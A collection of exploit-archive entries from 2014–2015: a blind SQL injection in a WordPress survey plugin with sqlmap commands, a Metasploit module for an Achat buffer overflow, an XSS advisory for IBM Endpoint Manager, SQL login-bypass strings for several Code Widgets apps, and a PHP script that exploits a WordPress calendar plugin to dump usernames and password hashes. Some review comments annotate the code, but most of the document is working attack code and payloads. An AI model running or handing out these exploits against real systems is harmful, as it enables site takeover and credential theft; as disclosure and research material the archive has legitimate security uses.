PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
            
#################################################################
# Exploit Title : Wordpress Survey and poll Blind SQL Injection

# Date : 2015-02-11

# Exploit Author : Securely (Yoo Hee man)

# Plugin : WordPress Survey and Poll

# Vendor Homepage : http://modalsurvey.sympies.com

# Tested On : Windows XP / sqlmap_v1.0

# Software Link : https://downloads.wordpress.org/plugin/wp-survey-and-poll.1.1.zip
                  https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip (latest version v1.1.7 as of February 11, 2015)

1. Detail 
- This plugin exposes the ajax_survey function as an [admin-ajax.php] action and processes it in /wp-survey-and-poll/settings.php
- settings.php performs no login (cookie) check
- the "survey_id" variable is not escaped for SQL before it is concatenated into the query


#################################################################
/**
 * AJAX handler for the "save" survey command (admin-ajax.php action
 * "ajax_survey").  The quoted excerpt ends inside the save branch, so any
 * other commands the real method handles are not visible here.
 *
 * Reads the survey fields from $_REQUEST, checks whether a row with the
 * given id already exists, then either updates that row and rebuilds its
 * questions and answers, or inserts a new survey with its questions and
 * answers.  Ends the request with die("updated") / die('success').
 *
 * Security notes (all from the visible lines):
 *  - No nonce verification or capability check appears before the writes.
 *  - sanitize_text_field() strips tags and whitespace; it does not make a
 *    value safe for SQL.  Every query below except one goes through
 *    $wpdb->prepare() or the array forms of insert()/update(), which $wpdb
 *    parameterises; the one raw concatenation is the COUNT(*) query on
 *    $survey_id.
 */
public function ajax_survey()
    {
		global $wpdb;
		$survey_id = "";
		$survey_name = "";
		$survey_start_time = "";
		$survey_expiry_time = "";
		$survey_global = "";
		if (isset($_REQUEST['survey_id'])) $survey_id = sanitize_text_field($_REQUEST['survey_id']);
		else $survey_id = "";
		// BUG: the sanitised copy is discarded -- the assignment inside the call stores the raw request value in $survey_name.
		if (isset($_REQUEST['survey_name'])) sanitize_text_field($survey_name = $_REQUEST['survey_name']);
		else $survey_name = "";
		if (isset($_REQUEST['start_time'])&&(!empty($_REQUEST['start_time']))) $survey_start_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['start_time']));
		else $survey_start_time = "";
		if (isset($_REQUEST['expiry_time'])&&(!empty($_REQUEST['expiry_time']))) $survey_expiry_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['expiry_time']));
		else $survey_expiry_time = "";
		if (isset($_REQUEST['global_use'])) $survey_global = sanitize_text_field($_REQUEST['global_use']);
		else $survey_global = "";
		if (isset($_REQUEST['options'])) $survey_options = sanitize_text_field($_REQUEST['options']);
		else $survey_options = "";
		if (isset($_REQUEST['qa'])) $survey_qa = sanitize_text_field($_REQUEST['qa']);
		else $survey_qa = "";
		// INJECTION POINT: $survey_id is concatenated straight into the SQL.
		// FIX: $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM ".$wpdb->prefix."wp_sap_surveys WHERE `id` = %d", $survey_id));
		// (the same %d pattern the two DELETE queries below already use).
		// An empty $survey_id also yields a malformed query ("`id` = "), get_var() returns null and the insert branch runs.
		$survey_check = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."wp_sap_surveys WHERE `id` = ".$survey_id);
		// 'sspcmd' is read without isset(); a request lacking it raises a notice.
		if ($_REQUEST['sspcmd']=="save")
		{
		if ($survey_check>0) {
		//update survey
			$wpdb->update( $wpdb->prefix."wp_sap_surveys", array( "options" => $survey_options, "start_time" => $survey_start_time, 'expiry_time' => $survey_expiry_time, 'global' => $survey_global),array('id' => $survey_id));
			$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_questions WHERE `survey_id` = %d",$survey_id));
			$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_answers WHERE `survey_id` = %d",$survey_id));
				// The (array) cast is applied twice; the second is a no-op.
				$qa_object = (array)json_decode(stripslashes($survey_qa));
				$qa_array = (array)$qa_object;
				foreach($qa_array as $keyq=>$qr)
				{
					foreach($qr as $key=>$oa)
					{
						if ($key==0)
						{
						$wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
							'id' => ($keyq+1), 
							'survey_id' => $survey_id, 
							'question' => $oa
							) );
							$qid = $wpdb->insert_id;
						}
						else
						{
						// explode() on a value without "->" leaves $oans[1] undefined (used as 'count' below).
						$oans = explode("->",$oa);
						$wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
							'survey_id' => $survey_id, 
							'question_id' => ($keyq+1),
							'answer' => $oans[0],
							'count' => $oans[1],   // vote count taken from request data; the insert branch below omits it
							'autoid' => $key
							) );					
						}
					
					}
				}
			die("updated");
		}
		else {
		//insert survey
			$wpdb->insert( $wpdb->prefix."wp_sap_surveys", array( 
				'id' => $survey_id, 
				'name' => $survey_name, 
				'options' => $survey_options, 
				'start_time' => $survey_start_time,
				'expiry_time'=> $survey_expiry_time,
				'global'=> $survey_global
				) );
				$qa_object = (array)json_decode(stripslashes($survey_qa));
				$qa_array = (array)$qa_object;
				foreach($qa_array as $keyq=>$qr)
				{
					foreach($qr as $key=>$oa)
					{
						if ($key==0)
						{
						$wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
							'id' => ($keyq+1), 
							'survey_id' => $survey_id, 
							'question' => $oa
							) );
							$qid = $wpdb->insert_id;
						}
						else
						{
						$oans = explode("->",$oa);
						$wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
							'survey_id' => $survey_id, 
							'question_id' => ($keyq+1),
							'answer' => $oans[0],
							'autoid' => $key
							) );					
						}
					
					}
				}
			die('success');
		}
		// Excerpt ends here: the "save" block and the method body remain open in the quoted source.
################################################################

2. POC
- http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498 [SQLi]
- DataBase() => "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>[Numbers compare]

3. Sqlmap
- sqlmap -u "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql


4. Solution:
Not patched

5. Discovered By : Securely(Yoo Hee man)
                   god2zuzu@naver.com
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit module for the Achat v0.150 beta7 SEH stack buffer overflow.
#
# Defender's summary of what is observable on the wire: the module talks to
# UDP/9256 (RPORT default below) and pushes well over 170 KB of filler
# ('Z'/'A' runs and 'A0000000002#Main' headers) in 8192-byte datagrams,
# followed by a payload restricted to unicode-friendly alphanumeric bytes
# (BadChars covers 0x00 and 0x80-0xff). That volume and byte profile on a
# chat port is a distinctive detection signal. The description notes the
# exploit is timing-dependent (two threads overflow the stack), so a failed
# attempt presumably leaves the service crashed -- worth correlating with
# unexpected Achat restarts.
class Metasploit3 < Msf::Exploit::Remote
  # Normal rather than Great/Excellent: reliability depends on thread timing.
  Rank = NormalRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  # Module metadata: target, payload constraints and default options.
  # 'Space' caps the encoded payload at 730 bytes; 'BadChars' forbids NUL and
  # every byte >= 0x80, which is why the alphanumeric unicode encoder is forced.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
      'Description'    => %q{
        This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By
        sending a crafted message to the default port 9256 it's possible to overwrites the
        SEH handler. Even when the exploit is reliable it depends of timing since there are
        two threads overflowing the stack in the same time. This module has been tested on
        Windows XP SP3 and Windows 7.
      },
      'Author'         =>
        [
          'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
          'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
        ],
      'License'	       => MSF_LICENSE,
      'References'     =>
        [
          ['CWE', '121'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'    => 730,
          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
          'StackAdjustment' => -3500,
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions'  =>
            {
              'BufferRegister' => 'EAX'
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested OK Windows XP SP3, Windows 7
          # Not working on Windows Server 2003
          # Single target: 'Ret' is a two-byte (unicode-expanded) address inside
          # AChat.exe itself, so ASLR of system DLLs does not matter here.
          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 18 2014'))

    # Only the port is configurable; 9256 is Achat's default listener.
    register_options(
      [
        Opt::RPORT(9256)
      ], self.class)
  end

  # Builds the oversized message and streams it to the target over UDP.
  # The buffer layout (offsets are fixed, do not reflow):
  #   1. a first 'A0000000002#Main' message padded with 114688 'Z' bytes,
  #   2. a second one whose 'A' padding runs up to the SEH record, with a
  #      unicode-safe first stage that lands EAX on the encoded payload,
  #   3. the encoded payload, padded to 1152 bytes.
  def exploit
    connect_udp

    # 0055 00          ADD BYTE PTR SS:[EBP],DL # padding
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # padding
    # 55               PUSH EBP                 # ebp holds a close pointer to the payload
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 58               POP EAX                  # mov eax, ebp
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 05 00140011      ADD EAX,11001400         # adjusting eax
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 50               PUSH EAX                 # eax points to the start of the shellcode
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 58               POP EAX                  # padding
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 59               POP ECX                  # padding
    # 0039             ADD BYTE PTR DS:[ECX],BH # padding
    # The listing above is the unicode-expanded view (every byte is followed by
    # 0x00 on the target); the string below holds only the pre-expansion bytes.
    first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"

    sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
    sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
    sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
    sploit << "\x61\x40" # POPAD + INC EAX

    sploit << target.ret # AChat.exe p/p/r address

    # adjusting the first thread's unicode payload, tricky asm-fu
    # the first seh exception jumps here, first_stage variable will be executed
    # by the second seh exception as well. It needs to be in sync with the second
    # thread, so that is why we adjust eax/ebp to have a close pointer to the
    # payload, then first_stage variable will take the rest of the job.
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 55               PUSH EBP                 # ebp with close pointer to payload
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 58               POP EAX                  # put ebp to eax
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
    # 05 00140011      ADD EAX,11001400         # more adjusting
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 50               PUSH EAX			# saving eax
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 5D               POP EBP			# mov ebp, eax
    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
    sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
    sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
    sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
    sploit << "\x00" + 'A' * 10 + "\x00"

    # Stream the buffer in 8192-byte datagrams. Past byte 172000 -- i.e. once
    # the second message's tail with the SEH records is being sent -- a one
    # second pause is inserted between datagrams, presumably to keep the two
    # server threads in the order the overflow relies on.
    # NOTE(review): the loop advances by whatever put() reports as sent; a
    # zero return would spin forever, nothing here guards against that.
    i = 0
    while i < sploit.length do
      if i > 172000
        Rex::sleep(1.0)
      end
      sent = udp_sock.put(sploit[i..i + 8192 - 1])
      i += sent
    end
    disconnect_udp
  end

end
            
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics
          Page

During a penetration test, RedTeam Pentesting discovered that the IBM
Endpoint Manager Relay Diagnostics page allows anybody to persistently
store HTML and JavaScript code that is executed when the page is opened
in a browser.


Details
=======

Product: IBM Endpoint Manager
Affected Versions:  9.1.x versions earlier than 9.1.1229,
                    9.2.x versions earlier than 9.2.1.48
Fixed Versions: 9.1.1229, 9.2.1.48
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
Advisory Status: published
CVE:  CVE-2014-6137
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137


Introduction
============

IBM Endpoint Manager products - built on IBM BigFix technology - can
help you achieve smarter, faster endpoint management and security. These
products enable you to see and manage physical and virtual endpoints
including servers, desktops, notebooks, smartphones, tablets and
specialized equipment such as point-of-sale devices, ATMs and
self-service kiosks. Now you can rapidly remediate, protect and report
on endpoints in near real time.

(from the vendor's homepage)


More Details
============

Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint
Manager, or TEM) components, such as TEM Root Servers or TEM Relays,
typically serve HTTP and HTTPS on port 52311. There, the server or relay
diagnostics page is normally accessible at the path /rd. That page can
be accessed without authentication and lets users query and modify
different information. For example, a TEM Relay can be instructed to
gather a specific version of a certain Fixlet site by requesting a URL
such as the following:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
  &version=1
  &useCRC=0

The URL parameter url is susceptible to cross-site scripting. When the
following URL is requested, the browser executes the JavaScript code
provided in the parameter:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0

The value of that parameter is also stored in the TEM Relay's site list,
so that the embedded JavaScript code is executed whenever the
diagnostics page is opened in a browser:

$ curl http://tem-relay.example.com:52311/rd
[...]

<select NAME="url">
[...]
    <option>http://"><script>alert(/XSS/)</script></option>
</select>


Proof of Concept
================

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion&version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0


Fix
===

Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.


Security Risk
=============

As the relay diagnostics page is typically not frequented by
administrators and does not normally require authentication, it is
unlikely that the vulnerability can be exploited to automatically and
reliably attack administrative users and obtain their credentials.

Nevertheless, the ability to host arbitrary HTML and JavaScript code on
the relay diagnostics page, i.e. on a trusted system, may allow
attackers to conduct very convincing phishing attacks.

This vulnerability is therefore rated as a medium risk.


Timeline
========

2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-09-03 Vendor notified
2015-01-13 Vendor releases security bulletin and software upgrade
2015-02-04 Customer approves public disclosure
2015-02-10 Advisory released


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Through these,
security weaknesses in company networks or products are uncovered and can
be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
            
source: https://www.securityfocus.com/bid/49207/info

Code Widgets Online Job Application is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

The following example input is available:

Username : ' or 1=1 or ''=''
Password: ' or 1=1 or ''='' 
            
source: https://www.securityfocus.com/bid/49210/info

Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/CS0099/index.asp?Q=2&A=[sqli] 
            
source: https://www.securityfocus.com/bid/49209/info

Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/CS0077/main.asp?key=[sqli] 
            
source: https://www.securityfocus.com/bid/49208/info

Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/CS0106/category.asp?cat=[sqli] 
            
<?php
 
/*

# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9  [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection


 This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
 
    # Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
    # Date: 2015-02-12
    # Exploit Author: Mateusz Lach
    # Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
    # Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
    # Version: 1.4.9
    # Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
    # CVE : CWE-89
    # OWASP Top10: A1-Injection
 */
 
// Request templates for the two injection stages. Both are sprintf() formats
// (the "%%20" pairs are URL-encoded spaces escaped for sprintf) aimed at
// wp-admin/admin-ajax.php?action=spiderbigcalendar_month. The cat_id
// parameter closes the plugin's own query with ")" and appends a UNION
// SELECT; "cat_id=1) UNION SELECT" in the access log or a WAF rule is the
// string a defender would key on.
//
// Stage 1 placeholders, in order: target host, cur_page_url (host again),
// FAKE_ID_TO_SEARCH (a marker echoed back so a successful injection can be
// recognised). The selected column wraps the first table whose name matches
// CHAR(37,117,115,101,114,115) -- "%users" -- in CHAR(35,35,35,35), "####".
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
 
// Stage 2 adds a fourth placeholder: the table name found in stage 1. It
// returns GROUP_CONCAT(user_login "##" user_pass) for every row, delimited by
// CHAR(35,33,35,33,35,33,35) = "#!#!#!#" (PATTERN_TO_SEARCH_USERS); rows are
// separated by GROUP_CONCAT's default "," (ROW_SEPARATOR) and the two fields
// by "##" (FIELD_SEPARATOR).
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
 
// Marker id injected as the first UNION column; the response is considered a
// hit when it contains "ev_ids=<marker>".
define('FAKE_ID_TO_SEARCH', 12345677654321);
define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
// Delimiters matching the CHAR() sequences used in FETCH_USERS_URL.
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
define('ROW_SEPARATOR', ',');
define('FIELD_SEPARATOR', '##');
// Target host is taken verbatim from the query string and only ever used
// inside the sprintf()'d URLs above; nothing validates its shape.
$server = $_GET['SRV'];
if (empty($server))
{
    echo 'Please put server (without protocol) name in SRV GET variable!';
}
else
{
    // Stage 1: recover the WordPress users table name via the injected
    // information_schema subquery.
    $fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
    $prefixCurl = curl_init($fullURL);
    curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
    // NOTE(review): curl_exec() returns false on a transport error; that value
    // is fed to stripos() unchecked, and the handle is never curl_close()d.
    $result = curl_exec($prefixCurl);
    if (stripos($result, PATTERN_TO_SEARCH) !== false)
    {
        // NOTE(review): $tableNames[0] is read even when preg_match() matched
        // nothing, and $tableName -- content controlled by the remote server --
        // is echoed into this page without htmlspecialchars().
        preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
        $tableName = str_replace('####', '', $tableNames[0]);
        echo 'tableName: '.$tableName.'<BR/>';
        // Stage 2: same endpoint, now selecting from the discovered table.
        $fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
        $usersCurl = curl_init($fullURL);
        curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($usersCurl);  
        if (stripos($result, PATTERN_TO_SEARCH) !== false)
        {
            // Cut the response down to the span between the first two
            // "#!#!#!#" markers, then turn "," and "##" into table rows/cells.
            // NOTE(review): if the closing marker is missing, $to is false and
            // the substr() length goes negative; the remote content is again
            // rendered into HTML unescaped.
            $from = stripos($result, PATTERN_TO_SEARCH_USERS);
            $to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
            $result = substr($result, $from, $to-$from);
            echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
        }
        else
        {
            echo 'Table name fetched, but not users - try to rewrite exploit :-(';
        }
    }
    else
    {
        echo 'NOT vulnerable :-(';
    }
}